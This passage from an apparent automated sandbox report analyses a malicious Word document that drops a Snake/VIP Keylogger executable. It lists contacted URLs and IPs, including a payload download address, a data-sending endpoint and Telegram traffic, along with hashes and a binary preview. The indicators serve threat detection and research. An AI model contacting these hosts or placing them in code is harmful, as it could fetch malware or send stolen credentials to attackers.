http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ns.adobe..0	hgqilegacy20306.exe, 00000008.00000002.916972860.0000000000FDD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.diginotar.nl/cps/pkioverheid0	hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	hgqilegacy20306.exe, 00000008.00000002.917824826.000000000365B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://66.63.187.123/txt/XcsQpLjhNNvxYtrw.exej	EQNEDT32.EXE, 00000002.00000002.397922458.000000000029E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://varders.kozow.com:8081	hgqilegacy20306.exe, 00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.917010447.00000000025E1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/favicon.ico	hgqilegacy20306.exe, 00000008.00000002.917824826.000000000365B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://aborters.duckdns.org:8081	hgqilegacy20306.exe, 00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.917010447.00000000025E1000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://ac.ecosia.org/autocomplete?q=	hgqilegacy20306.exe, 00000008.00000002.917824826.000000000365B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/sorry/index	hgqilegacy20306.exe, 00000008.00000002.917010447.0000000002671000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://51.38.247.67:8081/_send_.php?L	hgqilegacy20306.exe, 00000008.00000002.917010447.0000000002671000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/search?q=wmf	hgqilegacy20306.exe, 00000008.00000002.917010447.0000000002671000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://anotherarmy.dns.army:8081	hgqilegacy20306.exe, 00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.917010447.00000000025E1000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://checkip.dyndns.org/q	hgqilegacy20306.exe, 00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ns.adobe.c/D	hgqilegacy20306.exe, 00000008.00000002.916972860.0000000000FDD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26a	hgqilegacy20306.exe, 00000008.00000002.917010447.0000000002671000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/search?q=net	hgqilegacy20306.exe, 00000008.00000002.917010447.0000000002671000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://66.63.187.123/txt/XcsQpLjhNNvxYtrw.exeC:	EQNEDT32.EXE, 00000002.00000002.397922458.000000000029E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.net0D	hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	hgqilegacy20306.exe, 00000005.00000002.406450755.0000000002237000.00000004.00000800.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.917010447.00000000025E1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://secure.comodo.com/CPS0	hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	hgqilegacy20306.exe, 00000008.00000002.917824826.000000000365B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.entrust.net/2048ca.crl0	hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	hgqilegacy20306.exe, 00000008.00000002.917824826.000000000365B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	hgqilegacy20306.exe, 00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/	hgqilegacy20306.exe, 00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.917010447.0000000002620000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
132.226.8.169	unknown	United States	16989	UTMEMUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
188.114.97.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true
217.12.218.219	mail.jhxkgroup.online	Ukraine	21100	ITLDC-NLUA	true
66.63.187.123	unknown	United States	8100	ASN-QUADRANET-GLOBALUS	true
188.114.96.3	unknown	European Union	13335	CLOUDFLARENETUS	false
193.122.130.0	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
158.101.44.242	unknown	United States	31898	ORACLE-BMC-31898US	false
132.226.247.73	unknown	United States	16989	UTMEMUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1519252
Start date and time:	2024-09-26 09:18:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 35s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Thyssenkrupp PO040232.doc
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winDOC@9/15@89/9
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 52 Number of non-executed functions: 11
Cookbook Comments:	Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Scroll down Close Viewer Override analysis time to 78168.3071081964 for current running targets taking high CPU consumption Override analysis time to 156336.614216393 for current running targets taking high CPU consumption

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Thyssenkrupp PO040232.doc

Simulations

Behavior and APIs

Time	Type	Description
03:19:18	API Interceptor	275x Sleep call for process: EQNEDT32.EXE modified
03:19:22	API Interceptor	4090637x Sleep call for process: hgqilegacy20306.exe modified
03:19:24	API Interceptor	17x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
132.226.8.169	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Payment Slip.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	rTEKL__FTALEPVEF__YATTEKL__F__.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	rPROFORMAINVOICE-PO_ATS_1036pdf.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	z9OutstandingPayment.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	rPO_CW00402902400438.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	MCB_09252024.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	QUOTATION_SEPQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	PI-96328635,PDF.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Products List.pdf.scr.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
149.154.167.220	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse
	Payment Slip.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	https://link.edgepilot.com/s/ac2abbfe/hqsaYDfTTkaTmtUeMi97cg?u=https://telecommunications-delicious-oriental-hu.trycloudflare.com/owa%23jfrench@coastalorthopedics.com	Get hash	malicious	Outlook Phishing, HTMLPhisher	Browse
	SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exe	Get hash	malicious	VIP Keylogger	Browse
	inquiry.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Confirmaci#U00f3n de pago_shrunk.exe	Get hash	malicious	AgentTesla	Browse
	SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	SecuriteInfo.com.Win32.MalwareX-gen.14926.30373.exe	Get hash	malicious	MicroClip	Browse
	Halkbank_Ekstre_22#U202693.25.09.24.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Payment Slip.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	z95g0YV3PKzM3LA5zt.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exe	Get hash	malicious	VIP Keylogger	Browse	188.114.97.3
	inquiry.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Halkbank_Ekstre_22#U202693.25.09.24.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	E-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
mail.jhxkgroup.online	SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exe	Get hash	malicious	VIP Keylogger	Browse	217.12.218.219
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	217.12.218.219
	SecuriteInfo.com.Win32.CrypterX-gen.9884.23346.exe	Get hash	malicious	VIP Keylogger	Browse	217.12.218.219
checkip.dyndns.com	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	Payment Slip.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	z95g0YV3PKzM3LA5zt.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exe	Get hash	malicious	VIP Keylogger	Browse	193.122.130.0
	inquiry.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	Halkbank_Ekstre_22#U202693.25.09.24.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	E-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
api.telegram.org	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Payment Slip.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://link.edgepilot.com/s/ac2abbfe/hqsaYDfTTkaTmtUeMi97cg?u=https://telecommunications-delicious-oriental-hu.trycloudflare.com/owa%23jfrench@coastalorthopedics.com	Get hash	malicious	Outlook Phishing, HTMLPhisher	Browse	149.154.167.220
	SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exe	Get hash	malicious	VIP Keylogger	Browse	149.154.167.220
	inquiry.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Confirmaci#U00f3n de pago_shrunk.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.Win32.MalwareX-gen.14926.30373.exe	Get hash	malicious	MicroClip	Browse	149.154.167.220
	Halkbank_Ekstre_22#U202693.25.09.24.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Payment Slip.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	http://mintlink32.vercel.app/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.99
	https://bostempek.vercel.app/	Get hash	malicious	Porn Scam	Browse	149.154.167.99
	https://telegram-privatefree.pages.dev/	Get hash	malicious	Unknown	Browse	149.154.167.99
	http://tes.lavender8639.workers.dev/	Get hash	malicious	Unknown	Browse	149.154.167.99
	https://live-prons-sex.pages.dev/	Get hash	malicious	Porn Scam	Browse	149.154.167.99
	https://telegrambot-resolved.pages.dev/	Get hash	malicious	Unknown	Browse	149.154.167.99
	http://tw2-mzd.pages.dev/	Get hash	malicious	Unknown	Browse	149.154.167.99
	http://singaporeprivacygroup.vipsg3.my.id/	Get hash	malicious	Unknown	Browse	149.154.167.99
CLOUDFLARENETUS	450230549.exe	Get hash	malicious	AgentTesla	Browse	162.159.134.233
	64.exe	Get hash	malicious	Unknown	Browse	162.159.61.3
	450230549.exe	Get hash	malicious	Unknown	Browse	162.159.134.233
	PO-100001499.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	ADNOC requesting RFQ.exe	Get hash	malicious	FormBook	Browse	104.21.64.108
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	https://qwehikd-asdu.xyz/	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://geminishdw-dws.top/	Get hash	malicious	Unknown	Browse	188.114.97.3
	https://geminiqwc-sw.top/	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://qwekorqw-eqo.top/	Get hash	malicious	Unknown	Browse	188.114.96.3
UTMEMUS	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	Payment Slip.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	z95g0YV3PKzM3LA5zt.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	Halkbank_Ekstre_22#U202693.25.09.24.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	file.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	rLegalOpinionCopy_doc.cmd	Get hash	malicious	VIP Keylogger	Browse	132.226.247.73
	cargo details.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	Teklifformu_Ekinoks LS 1087251 04-00000152.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
ITLDC-NLUA	SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exe	Get hash	malicious	VIP Keylogger	Browse	217.12.218.219
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	217.12.218.219
	z1RFT798549034687-HJW90789-VXT9KGUINUII.exe	Get hash	malicious	AgentTesla	Browse	185.174.175.187
	rDFO68936OF-WVHU0780-FUIKTU4678G.exe	Get hash	malicious	AgentTesla	Browse	185.174.175.187
	BL Draft-Invoice-Packing list-Shipping Document.pif.exe	Get hash	malicious	FormBook	Browse	185.174.173.22
	SecuriteInfo.com.Win32.CrypterX-gen.9884.23346.exe	Get hash	malicious	VIP Keylogger	Browse	217.12.218.219
	SecuriteInfo.com.FileRepMalware.14031.20391.exe	Get hash	malicious	AgentTesla	Browse	185.174.175.187
	SecuriteInfo.com.FileRepMalware.19940.26551.exe	Get hash	malicious	AgentTesla	Browse	185.174.173.22
	MJI5380328-PQX82938839039-HW7V89292999.exe	Get hash	malicious	AgentTesla	Browse	185.174.175.187
	rMBP0835T67-H7D67889677-VFD899U8889990998Y.exe	Get hash	malicious	AgentTesla	Browse	185.174.175.187

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
05af1f5ca1b87cc9cc9b25185115607d	Payment Slip.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	BL.xls	Get hash	malicious	Remcos, PureLog Stealer	Browse	188.114.97.3
	Fwo62RjOqH.rtf	Get hash	malicious	Remcos, PureLog Stealer	Browse	188.114.97.3
	1zbL83sqmd.rtf	Get hash	malicious	Remcos, PureLog Stealer	Browse	188.114.97.3
	K0hpP6V2fo.rtf	Get hash	malicious	DBatLoader, Remcos	Browse	188.114.97.3
	AWS 1301241710.docx.doc	Get hash	malicious	Remcos, PureLog Stealer	Browse	188.114.97.3
	SPEC.xls	Get hash	malicious	Remcos, PureLog Stealer	Browse	188.114.97.3
	Payment Slip.xls	Get hash	malicious	DBatLoader, Remcos	Browse	188.114.97.3
	US0914424A.xla.xlsx	Get hash	malicious	Remcos, PureLog Stealer	Browse	188.114.97.3
36f7277af969a6947a61ae0b815907a1	Payment Slip.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	BANK PAYMENT COPY.doc	Get hash	malicious	XWorm	Browse	149.154.167.220
	14bnOjMV2N.doc	Get hash	malicious	Unknown	Browse	149.154.167.220
	6b58b6.msi	Get hash	malicious	PureLog Stealer	Browse	149.154.167.220
	RFQ_PO_KMM7983972_ORDER_DETAILS.js	Get hash	malicious	AgentTesla, RedLine	Browse	149.154.167.220
	RFQ.vbs	Get hash	malicious	PXRECVOWEIWOEI Stealer, PureLog Stealer	Browse	149.154.167.220
	SWIFT DETAILS-ERROR.docx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.Exploit.CVE-2018-0798.4.26981.24309.rtf	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.Exploit.CVE-2017-11882.123.4528.19655.rtf	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\XcsQpLjhNNvxYtrw[1].exe

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	708096
Entropy (8bit):	7.874129511837346
Encrypted:	false
SSDEEP:	12288:9Ok++Z4CujQ9TPfriopH5dvXVqml8rukCDWyFqAN6ukRLEdtTJx:9Ok++feQ9TPfrzpHPQ7r8yyQAwJg
MD5:	3E2EA8C3F5CA13F16F8CA1C85087F6B6
SHA1:	BC8727F0E142E331B34F01D2DC483DA61B24DB6B
SHA-256:	3E0693E5ED5EF3326BD7F6E54DB8ADC71E28540C2C3E2A60CBF8D1BDB0FF41F3
SHA-512:	343F33714FB819A3765A3B440E331057500EA17BD535FE02079222843C34F58A03FA17510EA091FC26DB63CBA8F4904724733AFC8EEA89672473BDCDBB354A10
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0......$........... ........@.. .......................@............@.................................L...O........ ................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc.... ......."..................@..@.reloc....... ......................@..B........................H........Y..\5..........,... 7...........................................0..\|........(..........(....}......{....(....}........(....}........(....}........(....}........(....}........(....}........(....}.....0..!..........(.... l...Y m...Z..(....X.+......0..m........s....}..... ....}.....#......cA}..... .ig.}.....#......c.}..... .'....s....}........s....}......}......}.....(.......(.......8..........>...%..,.o....s.......{.....{....(....}......{.....{....( ...}......{.....{

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{61F2494D-B578-458F-8F63-015293F99DA2}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	CE338FE6899778AACFC28414F2D9498B
SHA1:	897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
SHA-256:	4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
SHA-512:	6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{248D8B6E-043C-4C19-9A89-CAC72B9BE239}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	1.3522404970824842
Encrypted:	false
SSDEEP:	3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbP:IiiiiiiiiifdLloZQc8++lsJe1Mzw
MD5:	88EA6AE337C0115F70F604E88C69D1A8
SHA1:	3DA886A5E393C17B2E29F59E3432EC9700F6FEC7
SHA-256:	5098128A051AA10F7C6B649FA3C63C5C6C724A2BFCEC0A8D45BFF2E228B04C4A
SHA-512:	E5D67EBA9542B760184568C5D27AA2A858AA65D7FA93435D0B98EEDF66BD58DC4BDAFA6E817EB805240BD390BD91117F8F68F0E8580684223BA4E1324C8ADA00
Malicious:	false
Reputation:	low
Preview:	..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C46604C6-B56E-488C-8C5B-49457D2A721D}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	94720
Entropy (8bit):	3.5361662196956067
Encrypted:	false
SSDEEP:	768:ogI2Q5Q6IQXwvW5Kq2g05gI2Q5Q6IQXwvW5Kq2g05gI2Q5Q6IQXwvW5Kq2g05gIP:rSyemuSyemuSyemuSyemuSyemyA0pS
MD5:	2FDC72F70F2B3BD4630779F9559AAB59
SHA1:	C406978600C42C6F8964F526267FB9B0686DE1C8
SHA-256:	235482EB71D2C491B46CDC7ACC5000D938E3C497FCFB7E6033CF0306D701D40D
SHA-512:	946F55C27FD43798B3D6F0681B8341DDB7E1EC2D04CA572A4FC8C1D0CE45F6F4EF1A1012FD163F2ACBDCFC9B9AC1AC14DE1794784E022248D190CCAEAB25BBBF
Malicious:	false
